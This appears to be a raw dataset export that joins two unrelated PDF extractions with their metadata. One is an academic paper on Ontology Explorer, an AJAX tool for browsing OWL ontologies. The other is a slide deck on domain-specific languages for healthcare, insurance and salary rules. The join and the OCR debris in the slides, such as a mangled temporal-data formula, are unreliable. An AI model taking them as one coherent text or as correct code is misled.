null], [3365, 4099, null], [4099, 4986, null], [4986, 7209, null], [7209, 8470, null], [8470, 9749, null], [9749, 10718, null], [10718, 11350, null], [11350, 12186, null], [12186, 12650, null], [12650, 13424, null], [13424, 14425, null], [14425, 15502, null], [15502, 16022, null], [16022, 17395, null], [17395, 17921, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1363, true], [1363, 1719, null], [1719, 3365, null], [3365, 4099, null], [4099, 4986, null], [4986, 7209, null], [7209, 8470, null], [8470, 9749, null], [9749, 10718, null], [10718, 11350, null], [11350, 12186, null], [12186, 12650, null], [12650, 13424, null], [13424, 14425, null], [14425, 15502, null], [15502, 16022, null], [16022, 17395, null], [17395, 17921, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 17921, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 17921, null]], "pdf_page_numbers": [[0, 1363, 1], [1363, 1719, 2], [1719, 3365, 3], [3365, 4099, 4], [4099, 4986, 5], [4986, 7209, 6], [7209, 8470, 7], [8470, 9749, 8], [9749, 10718, 9], [10718, 11350, 10], [11350, 12186, 11], [12186, 12650, 12], [12650, 13424, 13], [13424, 14425, 14], [14425, 15502, 15], [15502, 16022, 16], [16022, 17395, 17], [17395, 17921, 18]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 17921, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
dc15abf61986b16037593b82888221a48b52422b
AN AJAX APPLICATION TO IMPROVE ONLINE ONTOLOGY BROWSING Ontology Explorer Matteo Busanelli, Massimo Bondi and Nicola Gessa ENEA Bologna, Via Martiri di Monte Sole 4, Bologna, Italy Keywords: OWL, Ontology, AJAX, GWT, Browser, Semantic Web, Web Usability. Abstract: OWL ontologies are one of the fundamental bricks of the Semantic Web architecture. In spite of this, ontology visualization on a web browser is nowadays not so easy; commercial browsers just show ontologies in plain text, with the OWL code. To avoid this, many ontology developers have implemented, together with their own ontologies, specific web applications to display them. But this can not be the right direction: a common Internet user does not have an easy way to browse an online ontology. Starting from a wide analysis of these applications for ontology visualization, considering their limitations and the last solutions for the development of dynamic web tools, the authors propose a GWT based architecture that, exploiting AJAX technologies, can ease the interfacing of web users with OWL ontologies. 1 INTRODUCTION Starting from the first paper that delineated the vision of the Semantic Web (Berners-Lee et al., 2001) many efforts have been done to produce specifications, technologies, guidelines and so on to develop this vision, where data could be understood by automatic applications. The architecture of the Semantic Web nowadays is strongly based on the definition of a set of technologies, (XML, RDF, etc.). Among these, OWL, a language for ontology definition, is surely one of the fundamental. Ontologies have been defined in different ways. One of them is “An ontology is an explicit specification of a conceptualization” (Gruber, 1995); ontologies should then represent the “knowledge” below plain data. They can perhaps be considered as the meeting point between the human vision and the automatic applications. For this reason new tools should be provided to help users that are non expert in software or informative tools, to approach the Semantic Web technologies. Starting from these considerations, our work targets to the development of a web-based tool that could represent the right support for those that do not know (and that also do not want to know) anything about the technologies underlying ontologies, but that can obtain from them serious advantages in their activities. After the analysis of the limits of the main common software for ontology management, we present an innovative web application, named Ontology Explorer, for the ontology browsing that, avoiding installation or configuration activities, aims to improve the usability and comprehensibility of ontologies that are published online. In our perspective, ontology browsing is a relevant feature that should be well supported by a software architecture that aims to improve the ontology and Semantic Web usability. In the next section we will present the state of art about web applications for ontology browsing. Section 3 will present our design approach for the development of the application. In section 4 we will more deeply describe the implemented interface and the functionalities, detailing the innovative aspects we have introduced in respect of other solutions. In chapter 5 we will describe our first conclusions and the future developments. 2 WEB APPLICATIONS FOR ONTOLOGY BROWSING The first consideration starting this work was that ontologies are written in OWL file, and this format is not well supported by browsers like Internet Explorer™ or Opera™, that are not able to represent OWL files in a convenient manner, but instead in general show the plain XML representation. Studying the state of art, our main references have been a set of web applications for ontology browsing and Protégé, which is a widespread java-based desktop application for ontology management. Regarding the web applications, we have selected and analysed a set of 9 products. They are: - **Owl to Ace** (Kaljurand, 2006): transforms an OWL ontology in Attempto Controlled English (ACE). It can be considered, instead of a browser, like an application that translates an ontology from a machine-readable form in a human-readable one. - **HarmonISA Ontology Viewer** (Hall, 2006), **Csml Ontology Viewer** (Jeong et al., 2006), **Nature Navigator** (the guide - What is Nature Navigator?, 2007), **IASCF Taxonomy Viewer** (International Accounting Standards Committee Foundation., 2005): allow the visualisation and browsing of a predefined ontology. It is based on a set of html pages linked each other. - **RxNav** (Lussier, & Bodenreider, 2007): allows the browsing of a specific predefined ontology about pharmaceutical products. It is based on a java application that is invoked by the link on a web page. - **Ontology Lookup Service** (Cote et al., 2006): allows the visualisation and browsing of a predefined ontology about genetics. It displays the information in a tree structure, representing a taxonomy that is the starting point to access to cards about the elements of the ontology. - **GoFish** (Berriz et al., 2003): allows the visualisation and browsing of a set of specific predefined ontologies about genetics. It is implemented in an application that displays the information in structures like trees, cards or tables. - **Pellet** (Sirin et al., 2003): it acts more like an ontology analyser than an ontology browser, managing any kind of ontology (RDF, OWL). It runs in batch mode, and there is no runtime interaction with the user. It allows to specify the target ontology. The analysis consists in a plain text file that reports the extracted information. - **KSMSA Ontology Browser** (Ševčenko, 2003): it is a web application for browsing the SUMO (Niles & Pease, 2001) ontology and all the connections with WorldNet, developed within the KSMSA project. In particular this tool is an online version of the more powerful editor that could be downloaded. All the ontologies are defined in the KIF (Knowledge Interchange Format) language. The browser is strictly developed for this set of ontologies. Clearly, this list reports only the main aspects of each tool. The main considerations about these applications, starting from which we will fix a set of requirements for the Ontology Explorer, are: - These tools do not allow the browsing of an ontology specified by the user. - These tools are not configurable, in any perspective. This means that the user cannot customise the interface and some functions in order to make the tool more useful. - Sometimes, the description level is too high, with too many unclear technical details, making it too cumbersome and discouraging. - In many of them there is not the possibility to execute research operations on the ontology. It is worth to note that the wide amount of web tools to allow Internet users to visualize online ontologies demonstrates the need for the ontology designers to show on the web in a useful manner their work. In other words, up to now, many ontology developers not only design their own ontology, but also they implement brand new “specific” tools to allow the consultation of their ontologies. In many cases this approach tries just to solve isolated issues, without considering the online visualisation of ontologies as an issue that is common for ontology designers, and without pursuing a unique solution. After this first analysis, we concentrated on the characteristics of Protégé, that is not a web application, but that perhaps represents the main reference in the ontology definition field. We have identified the following drawbacks in ontology browsing using Protégé (we refer to version 3.2): - The use of labels is inadequate, and quite accessory. The browsing functionalities are based on the use of IDs, which are used to provide semantic information to the users. - The interface for class management is separated from the interface for instance management. This presupposes in the user the knowledge of the differences between classes and instances; we want to avoid such assumption. - Class visualisation: Protégé imposes the distinction between the logical and the property view; this is not intuitive for a common user, and again requires specific skills. Moreover, the default visualisation is the logical one, that does not display the list of the properties for a selected class, that we consider one of the fundamental information that is sought about classes. The research functionality acts separately on classes and instances: it is impossible to do a research on both classes and instances from the same entry point. Moreover, the research is performed only on IDs, and not on labels. Again, this is a strong limitation, and prevents the definition of multi-language ontology (since research can be performed only in one language). The research interface for instances is also laborious and not easy to use. - Instance visualisation is not well-structured. - The descriptions, both for classes and for instances, are displayed in tables with property/value keys, and are reported with the label rdfs:comment. Such descriptions could be instead provided in a more clear way (for example using tooltips on the labels). Some of these limitations will be faced in the next releases of Protégé. Finally, we considered also SWOOP and Longwell, but these are not web-applications, and they are out of our context. 3 THE ONTOLOGY EXPLORER Differently by other well-recognized widespread formats in Internet, OWL/XML files are always displayed by web browsers as plain XML files. Although we did not develop a plug-in, we wanted a way to visualize in the browsers (not in the OWL code) OWL/XML ontologies that could be found in Internet, without the need to download specific software, install it, etc. etc. The Ontology Explorer is designed to be intuitive to use (also for the inexpert user) and many visualization and navigation configuration alternatives are available. During the design phase, we first considered the limitations listed in section 2. Then we have outlined for the tool some use cases that have been identified in different projects (Moda-ML (Gessa et al., 2005), DDTA Puglia (Regione Puglia DDTA, 2006) and Leapfrog IP (LEAPFROG-IP project)) for the development of solutions for business interoperability and we identified the generic requirements and features for the software. 3.1 Use Cases for Ontology Browsing Without going to much in details, one of the results of the Moda-ML project has been the definition of a vocabulary of terms upon which a set of XML document schemas has been defined for data exchange in the Textile/Clothing sector (De Sabbata et al., 2005). For this vocabulary we built a semantic representation (defined with a set of OWL ontology) of both the terms and the documents defined in the vocabulary (Gessa et al., 2006). On the other hand, the DDTA project (Digitalizzazione dei Distretti a supporto della filiera produttiva del Tessile/Abbigliamento) supports the definition and implementation of services to enable the constitution of enterprise networks within the textile supply chain in Puglia. This project exploits the results of Moda-ML. In these contexts domain experts are fundamental. Usually, domain experts have great knowledge about concepts that concern their expertise area, but their knowledge about ontology implementation is quite absent. Then, an example of a typical user of the Ontology Explorer (OE) could be a textile expert who consults the Moda-ML vocabulary and documents from a semantic point of view. In this scenario of B2B interoperability: 1. It has been identified the need to search for specific concepts defined in a domain ontology in order to understand their properties and to design the proper applications and data formats to manage and exchange the related information. 2. In order to manage XML Schema documents, it has been identified the need for the designer to search for semantic concepts modelled in the XML Schema documents. In this case we need a tool to easily browse among the concepts treated in the documents, without studying the document structure. This procedure is useful to identify reusable components already defined in existing documents. 3.2 Requirements for the Tool We have identified a set of non-functional requirements for the tool to develop. The tool - must be able to load, read and visualize every ontology that is written in OWL. - must hide the technical and formal aspects related to the ontology language. - should be as much as possible interactive, allowing a fast and friendly use. - should be configurable at different levels. - must provide a powerful and easy to use search mechanism, regardless the way the concepts have been formalised (for example, if they are classes or instances). - must be able to visualize classes and instances in parallel and in a homogeneous way. The Ontology Explorer allows the loading of an OWL ontology, to browse and display every kind of information related to the concepts defined in the ontology and to perform a search on the items of the ontology. In the following sections the capabilities of the application will be detailed deeply. 3.3 Architecture of the Application In order to achieve the objectives fixed during the analysis phase, we adopted the AJAX technology, which allows developing highly interactive web-applications, exploiting asynchronous communication between client and server. The architecture of the tool is composed of: - A service (server side) that implements the OWL logic and manage the loaded ontology; we called it Ontology Service. - A set of beans-like Java objects, called OWL Wrappers, that have only to carry the information extracted from the ontology between the service and client. - A client interface running on the web browser that is based on GWT AJAX dynamic widgets plus CSS style sheets for layout formatting. The client will represent all the information coded in the wrappers using graphical components that we have called Semantic Widgets. These widgets are derived from the basic ones that GWT offers (like tree, textbox, etc...). They have been built to implement and exploit the logic of many OWL elements (i.e. taxonomy or relations between instances). The wrappers are used to populate the widgets with the needed content. In some cases, a different content “forces” the same widget to assume a specific behaviour: the behaviour of a widget depends on the characteristics of the content to display. The main idea behind these Semantic Widgets is to have a library of reusable graphical components that could “understand ontological structures” and to use them to better represent information and to improve the user experience. All the Semantic Widgets were developed in a way that makes them easily graphically customizable, allowing the setting of colours, layout, images and so on simply using CSS style sheets. 4 INTERFACE DESIGN The interface of the Ontology Explorer (http://www.cross-lab.it/cross-lab/imple/pgcl.asp?lingua=en&p=247&node_id=6.1.1) has been structured in three different sections, in order to well separate and identify the different operations that can be performed, to reduce the confusion and the embarrassment for the user and to improve the understandability of the information. 4.1 The Loading Section In the top of the program interface an area is dedicated to the management of the application. Here is the form to load the target ontology, to provide general information about it, to configure some aspects related to the browsing and finally to show error messages if need. There are two ways to start the Ontology Explorer and to load a remote ontology in the tool: - In the first way by connecting to the tool (http://winter.bologna.enea.it/OntologyExplorer/ OntologyExplorer.html) and then specifying the URL of the OWL file in the text box. - The second way allows to visualize in the Ontology Explorer, linked directly by another web source (like an HTML page), a specific concepts within its ontology. In other words, appending to the URL of the application, respectively the URL of the OWL file of an ontology and the name of the concept you are looking for (i.e. adding to http://winter.bologna.enea.it/OntologyExplorer/OntologyExplorer.html the string “?ontologyUrl=ontologyURL&concept=conceptName”), the Ontology Explorer will be open directly on the conceptName. ![Figure 1: The interface of the Ontology Explorer.](image) When an ontology is already loaded (as in Fig. 1; due to space constraints, we show only a small image), here the user can find the ‘More Info’ button that opens a pop-up panel showing all the general information about the loaded ontology. Also, the user can find the ‘New Ontology’ button that is useful to load a new ontology. 4.2 The Navigation Section The left part of the interface is dedicated to show a dynamic taxonomy tree used to browse and manage the taxonomies defined by the ontology. Once the ontology has been loaded, the tree is filled with all the information related to the taxonomies. The taxonomies can show both the classes and the instances or only classes. This aspect is in any case configurable (see about application configuration in the following). In this part of the interface it is also available a “search field” that allows to search in the taxonomy tree the desired concepts. The search is dynamic in the sense that while the user is typing text in the search box, if he presses the “Enter” key, a dynamic list of all the concepts matching the typed text is presented. In this way the user could change the search on the fly and, in many cases, he doesn’t have to complete the text that he is looking for. In fact, by clicking on the list and pressing the ‘Go’ button, the tree will be opened at the concept level in the taxonomy and the corresponding detail panel will be displayed in the description section. Since classes and instances are both visualised in the tree, in order to distinguish them we represent them with different formatting styles: in particular the classes are always presented in bold, while instances are presented in italic. Another important feature of the tree is the tip that, if enabled by the configuration, shows a brief textual description (if exists) of the concept every time the mouse pointer passes over it. 4.3 The Description Section The right part of the interface is dedicated to the visualisation, in specific tab panels, of the details related to the concepts (classes or instances) selected in the taxonomy tree. In fact, by clicking an element in the tree, a tab is opened here. If the user clicks on a class the opened tab panel will show the class name (label), the description, the super class and two sub-panels: one for the list of the properties (each one containing its description and other property information like domain and range) and another for the list of the instances (each one containing its description tip and being clickable to open the relative detail panel). If the user clicks on an instance the opened panel will show, together with the name and the description, also the list of the property values for the instance. This part of the browser can collect at the same time many tabs to hold information about different selected objects. The informative elements in the panel are all clickable, in order to open directly from here other tabs and to allow a more powerful navigation between the different concepts crossing the whole ontology. Together with this interface, other kinds of information are provided using pop-up, in order to not fill the interface with too many data. 4.4 Configuration In our perspective, an ontology can be used by different kinds of persons, with different skills. We consider very important to allow the configuration of our tool in order to match with the browsing requirements of the different users. We then predisposed our application to provide a set of configuration parameters. For this purpose there is a panel where the user can decide if to show the classes along with their instances or not, and to show labels instead of names (OWL IDs) for a better explanation and research of the concepts modelled in the ontology. The configuration section of the Ontology Explorer consists in a pop-up that appears when the user clicks on the ‘Options’ button. Through this pop-up the user can configure many visualization aspects of the OE: - To show or not instances of classes in the tree (the search will be performed also among instances accordingly to this choice). - To show or not tooltips with the description (if any) of the concepts. - To show concepts in the tree by their unique ontology names (ID) or by their labels. - To set the search in “start with” (fast search) mode or in “substring” mode (slow). - To show instances in a tab of a class by default using names or, if any, labels. 5 CONCLUSIONS AND FUTURE WORKS Nowadays proper tools for online OWL ontology reading and browsing are lacking, or are limited. As shown in the use cases we identified in section 3.1, Semantic Web technologies can solve a set of problems related to business vocabulary management. We developed an AJAX-based web application named Ontology Explorer that overcomes some of the limitation of existing tools and allows an intuitive ontology browsing for every kind of Internet user. In particular, the OE: 1. is able to load every OWL/XML ontology on the Internet, in this sense it is not built to manage a specific ontology. We have tested it with many online ontologies, and with the Moda-ML ontology, that includes 373 classes, 44 relationships and 1098 instances. 2. matches with the skills of a person that is not an ontology expert. To this aims, the concepts of classes, instances, datatype or object property are completely transparent to the users. A central issue has been also the design of friendly forms for information visualisation. 3. provides a powerful research interface. 4. exploits the use of labels, that allows the browsing of multi-language ontologies, a more strong comprehension of the terms and a stronger search and browsing. The concept IDs in an ontology should be used as are primary keys in a database, just to identify a class/instance/property, but IDs should not be used to provide semantic information (as usually happens). It is worth to note that the Ontology Explorer distinguishes itself from other tools like Protégé because it should be considered not like an editor for ontology Expert (like Protégé), but like a powerful browser for Domain Expert. Considering our use cases, exploiting the semantic representation of the Moda-ML business vocabulary, the tool has simplified the interfacing with the terms and the XML Schema documents, allowing also a more easy search and analysis of them. The future steps to improve the Ontology Explorer will concern mainly: - To enhance the configurability of the tool providing a new set of customizations about the domain of user’s interest. This will be achieved by defining some Semantic Profiles that could be adopted by the user (externally to the ontology) to browse a specific ontology. - To add a new Advanced Semantic Search that could use logic inference to deduce non explicit information and that allows enlarging the resulting set of the matching concepts to all the semantically related ones. - To improve the graphical aspect and the usability and to solve some compatibility issues with some browsers (for instance Opera™ and Firefox™ don’t render some widgets so well). REFERENCES Regione Puglia. Assessorato allo Sviluppo Economico, Progetto "Distretto Digitale a supporto della filiera produttiva del Tessile Abbigliamento" (DDTA), 2006. LEAPFROG-IP project: http://www.leapfrog-eu.org/LeapfrogIP/main.asp 88
{"Source-Url": "http://www.scitepress.org/Papers/2009/22702/22702.pdf", "len_cl100k_base": 4918, "olmocr-version": "0.1.49", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 18694, "total-output-tokens": 6125, "length": "2e12", "weborganizer": {"__label__adult": 0.00034499168395996094, "__label__art_design": 0.0008878707885742188, "__label__crime_law": 0.0005140304565429688, "__label__education_jobs": 0.000980377197265625, "__label__entertainment": 0.00016796588897705078, "__label__fashion_beauty": 0.00020766258239746096, "__label__finance_business": 0.0007262229919433594, "__label__food_dining": 0.0003767013549804687, "__label__games": 0.0005965232849121094, "__label__hardware": 0.0007987022399902344, "__label__health": 0.0007510185241699219, "__label__history": 0.0004246234893798828, "__label__home_hobbies": 0.000110626220703125, "__label__industrial": 0.0005044937133789062, "__label__literature": 0.0006361007690429688, "__label__politics": 0.0003578662872314453, "__label__religion": 0.0006566047668457031, "__label__science_tech": 0.145751953125, "__label__social_life": 0.00015282630920410156, "__label__software": 0.08050537109375, "__label__software_dev": 0.763671875, "__label__sports_fitness": 0.00024390220642089844, "__label__transportation": 0.0005006790161132812, "__label__travel": 0.00028204917907714844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 26602, 0.02643]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 26602, 0.39862]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 26602, 0.88458]], "google_gemma-3-12b-it_contains_pii": [[0, 3632, false], [3632, 8465, null], [8465, 13018, null], [13018, 16843, null], [16843, 21596, null], [21596, 26602, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3632, true], [3632, 8465, null], [8465, 13018, null], [13018, 16843, null], [16843, 21596, null], [21596, 26602, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 26602, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 26602, null]], "pdf_page_numbers": [[0, 3632, 1], [3632, 8465, 2], [8465, 13018, 3], [13018, 16843, 4], [16843, 21596, 5], [21596, 26602, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 26602, 0.0]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
692946fb29f5786ae37a6aa9b75beb3b5ac004bb
Let's build Fachlichkeit like they build Rockets Markus Völter voelter@acm.org www.voelter.de @markusvoelter Bernd Kolb kolb@itemis.de www.itemis.de @berndkolb Motivation The Story of Paula and Knut (maybe your story) “"I just finished the third revision of the specification. But I'm sure it will take another two month of annoying ping-pong with the IT."” Paula 45, Product Engineer “"Once again the spec was crap. Another 3 month wasted...”” Knut 32, Software Engineer Examples Healthcare Context & Motivation Mobile Apps that help patients with treatments Monitor side-effects and recommend actions Manage dosage of medications Context & Motivation Mobile Apps that help patients w/ treatments Monitor side-effects and recommend actions Manage dosage of medications “Algorithms“ for recommendations and dosage at the core of these apps. Safety-critical, since they could hurt patients. Customer develops many different apps/algos like this, efficiency of algo development is key. Health care professionals directly „code“ algos, using a suitable language. Avoids indirections through requirements docs. Speed up dev significantly. Pretty typical DSL-based dev-approach. Some Language Impressions I decision table BpScoreDecisionTable(sys: bpRange, dia: bpRange) = <table> <thead> <tr> <th>sys</th> <th>&lt;= 50</th> <th>[51..90]</th> <th>[91..95]</th> <th>[96..100]</th> <th>[101..109]</th> <th>&gt;= 110</th> </tr> </thead> <tbody> <tr> <td>&lt;= 90</td> <td>1</td> <td>1</td> <td>3</td> <td>4</td> <td>5</td> <td>6</td> </tr> <tr> <td>[91..140]</td> <td>2</td> <td>2</td> <td>3</td> <td>4</td> <td>5</td> <td>6</td> </tr> <tr> <td>[141..150]</td> <td>3</td> <td>3</td> <td>3</td> <td>4</td> <td>5</td> <td>6</td> </tr> <tr> <td>[151..160]</td> <td>4</td> <td>4</td> <td>4</td> <td>4</td> <td>5</td> <td>6</td> </tr> <tr> <td>[161..179]</td> <td>5</td> <td>5</td> <td>5</td> <td>5</td> <td>5</td> <td>6</td> </tr> <tr> <td>&gt;= 180</td> <td>6</td> <td>6</td> <td>6</td> <td>6</td> <td>6</td> <td>6</td> </tr> </tbody> </table> decision tree DiarrheaStoolsDecisionTree(score: DiarrheaStoolsOverBaseline, patientHasAnySymptom: boolean, goToStartBrat: boolean) patientHasAnySymptom score >= 7 score in [4..6] goToStartBrat DiarrheaReco1 DiarrheaReco3 DiarrheaReco2 DiarrheaRecoSBrat DiarrheaRecoCBrat type temperature: number[36|42]{1} type measuredTemp: number[35|43]{2} Error: type number[32.55|39.99]{4} is not a subtype of number[36|42]{1} val T_measured: measuredTemp = 42.22 val T_calibrated: temperature = T_measured * 0.93 Some Language Impressions II **PASS** ```java function test gradeStools given 7 expected 3 given 6 expected 2 given 5 expected 2 given 4 expected 2 ``` **PASS** ```java function test DiarrheaStoolsDecisionTree given false, 1, true, false expected DiarrheaUSRecoLevel1Symptom given false, 9, false, false expected DiarrheaUSRecoGrade3 ``` **PASS** ```java function test checkScreeningQuestion given answers to DiarrheaScreeningQuestionnaire{ dietarySupplements: false medication: true hospitalized: false expected true } ``` Insurance Context & Motivation Specify/Program Insurance Programs Write formal code in a DSL mixed with tables and text No tool support whatsoever No testing (except inspection) No reuse No modularity No variability Context & Motivation Specify/Program Insurance Programs Write formal code in a DSL mixed with tables and text No tool support whatsoever No testing (except inspection) No reuse No modularity No variability A real Example: Legacy Write formal code in a DSL mixed with tables and text No tool support whatsoever No testing (except inspection) No reuse No modularity No variability Printed, PDF Developer reads „spec“ Very idiomatic implementation Dev acts as a human compiler and implements it in C Spec/Program „Pixelcrap“ C Code Specify/Program Debug Solution Approach **Insurance Programs** Write formal code in a DSL mixed with tables and text Now with IDE support and executable tests The same notation! A real Example: Future Specify/Program/Test/Debug Insurance Programs Generate C Code Still exactly the same C code, or improved as needed. Incremental Refinement/Refactoring of languages: - Partially automated migration of models - Add model natural notations (insurance-specific, math) - Add Support for modularity, reuse, variants Salary Context & Motivation Calculate Salaries + Taxes for Employees Various deployment platforms Complex Business Logic Variability over 16 States Based on evolving Law Dates & Currencies Temporal Data + Arithmetics Reactive Rules Currencies and Dates ```kotlin fun printDate(d: date) {...} val today = /2018 01 23/ // date type inferred { printDate(today) } val nextWeek: date = today + 7 val lastYear: date = today - 365 // ignoring leap years for now :-( val howLongIsAYear: number = lastYear - today val salary : TT[currency] = TT | /2017 01 01/ => 5.000 EUR | | /2017 05 01/ => 6.000 EUR | ``` Temporal Data \begin{align*} \text{val salary} & \cdot 2017\ 10\ 07/ = \text{TT} \quad | \quad /2017\ 01\ 01/ & \Rightarrow & 5.000\ \text{EUR} \\ & \quad | \quad /2017\ 05\ 01/ & \Rightarrow & 6.000\ \text{EUR} \\ \text{val salary} & \cdot 2017\ 11\ 05/ = \text{TT} \quad | \quad /2017\ 01\ 01/ & \Rightarrow & 5.000\ \text{EUR} \\ & \quad | \quad /2017\ 05\ 01/ & \Rightarrow & 5.500\ \text{EUR} \end{align*} \text{val salary : TT[currency] = TT} \quad | \quad /2017\ 01\ 01/ & \Rightarrow & 5.000\ \text{EUR} \\ & \quad | \quad /2017\ 05\ 01/ & \Rightarrow & 6.000\ \text{EUR} \begin{align*} \begin{array}{c} a + s \\ \hline a_1 \\ \hline a_2 \\ \hline a_3 \end{array} & \quad + \\ \begin{array}{c} \hline \hline \hline \end{array} \begin{array}{c} a + s \\ \hline a_1 + s \\ \hline a_2 + s \\ \hline a_3 + s \end{array} \end{align*} \begin{align*} \begin{array}{c} a \\ \hline a_1 \\ \hline a_2 \\ \hline a_3 \end{array} & \quad + \\ \begin{array}{c} a \\ \hline b_1 \\ \hline b_2 \end{array} = \\ \begin{array}{c} a + b \\ \hline a_1 + b_1 \\ \hline a_2 + b_1 \\ \hline a_3 + b_2 \end{array} \end{align*} Result Data and Rules ``` result data [monthly] Salary { employment -> Employment // basic data amount : currency } calculation for Tax depends Salary foreach person.employments as salaries calculate [monthly] { val factor = // do some weird tax math val total := salaries.amount.sum amount := total * factor employment:= ctx.employment } result data [monthly] Tax { person -> Person // basic data amount : currency } ``` // depends on Salaries of all employments // of the Tax bill’s person // in the respective time // sum up all salaries in current month // populate fields of the result data item // ctx is available in all calculations Result Data and Rules calculation for SalaryReport // data structure indexed to an Employment depends Salary as s Salary[month.prev] as s_last calculate [monthly] { currentSalary := s.amount lastMonthsSalary := s_last.amount delta := s.amount - s_last.amount } calculation for Salary depends ... calculate [monthly] { val e = ctx.employment val totalHoursWorked = e.workedHours.reduce(SUM) val averageWage = e.wage.reduce(WEIGHTED_AVERAGE) val religion = e.person.religion.reduce(LAST, increment.year) IDE Support Approach in a Nutshell Integration of Fachler It’s what makes a business tick. Distinguishes the business. - Business Rules - (Financial) Calculations - Data Structures - Mappings or Queries - Validations - Scientific Processes - Contracts - Processes - UIs It's what makes a business tick. Distinguishes the business. Contributed not by developers ... but typically implemented in software SO HOW DOES IT GET INTO THE SOFTWARE? Contributed not by developers ... but typically implemented in software Reality Goal!? Let Business/Domain people contribute directly! Give them expressive, productive tools to do so! Expressivity for Core Domain Knowledge User-Friendly Notation Great Tool/IDE Testing Meaningful Analyses Synthesis of Software Separation from Technology Outdated Technology Obscure Business Logic Fachlichkeit „burried“ in implementation code. Technology & Business Logic now have connected lifecycles. Goal: Separate the Lifecycles Fachlichkeit Technology Technical Separation of concerns From Wikipedia, the free encyclopedia In computer science, separation of concerns (SoC) is a design principle for separating a computer program into distinct sections, such that each section addresses a separate concern. A concern is a set of information that affects the code of a computer program. A concern can be as general as the details of the hardware the code is being optimized for, or as specific as the name of a class to instantiate. A program that embodies SoC well is called a modular[1] program. Modularity, and hence separation of concerns, is achieved by encapsulating information inside a section of code that has a well-defined interface. Encapsulation is a means of information hiding.[2] Layered designs in information systems are another embodiment of separation of concerns (e.g., presentation layer, business logic layer, data access layer, persistence layer).[3] The value of separation of concerns is simplifying development and maintenance of computer programs. When concerns are well-separated, individual sections can be reused, as well as developed and updated independently. Of special value is the ability to later improve or modify one section of code without having to know the details of other sections, and without having to make corresponding changes to those sections. Outdated Technology Non-Understandable Logic Expensive to Evolve Business Logic Technology Metamodel for Business Logic Clearly defined data structure to express all business-relevant structures, behaviors and non-functional concerns. Metamodel for Business Logic - Data Structures - Behavioral Rules - Expressions - Validations - Special Types (e.g. temporal) ... Domains often have a rich language/vocabulary anyway; it just needs to be formalized. (DDD: Ubiquitous Language) Metamodel for Business Logic Semantics Clearly defined data structure to express all business-relevant structures, behaviors and non-functional concerns. Well-defined meaning of this data structure Metamodel for Business Logic Semantics Clearly defined data structure to express all business-relevant structures, behaviors and non-functional concerns. Well-defined meaning of this data structure - IDE Support is possible - Evolution is possible - Portability is possible - Type Checking - Solver-Integration - Model Checking - Contracts Metamodel for Business Logic Clearly defined data structure to express all business-relevant structures, behaviors and non-functional concerns. Semantics Well-defined meaning of this data structure Execution Engine Technical Platform for correct, efficient and scalable execution Tech Infrastructure Metamodel for Business Logic Semantics - Clearly defined data structure to express all business-relevant structures, behaviors and non-functional concerns. - Well-defined meaning of this data structure Tech Infrastructure - Technical Platform for correct, efficient and scalable execution Metamodel for Business Logic Semantics Tech Infrastructure - generate code, deploy - transfer data, interpret Metamodel for Business Logic Syntax Semantics Language generate code, deploy transfer data, interpret Tech Infrastructure Metamodel for Business Logic Syntax Semantics Syntax is critically important for Productivity Communication and Review Domain Expert Integration generate code, deploy transfer data, interpret Only Buttons and Forms don‘t work! Tech Infrastructure Metamodel for Business Logic Syntax Semantics Language generate code, deploy transfer data, interpret Tech Infrastructure Metamodel for Business Logic Syntax Semantics Language Workbench generate code, deploy transfer data, interpret Tech Infrastructure A Language Workbench – a tool for defining, composing and using ecosystems of languages. Other Language Workbenches {S} spoofax TU Delft xtex itemis/Typefox Rascal CWI Amsterdam The Whole Platform Solmi/Persiani Evaluating and Comparing Language Workbenches Existing Results and Benchmarks for the Future Sebastian Erdweg\textsuperscript{d}, Tijs van der Storm\textsuperscript{a}, Markus Völter\textsuperscript{e}, Laurence Tratt\textsuperscript{b}, Remi Bosman\textsuperscript{f}, William R. Cook\textsuperscript{c}, Albert Gerritsen\textsuperscript{f}, Angelo 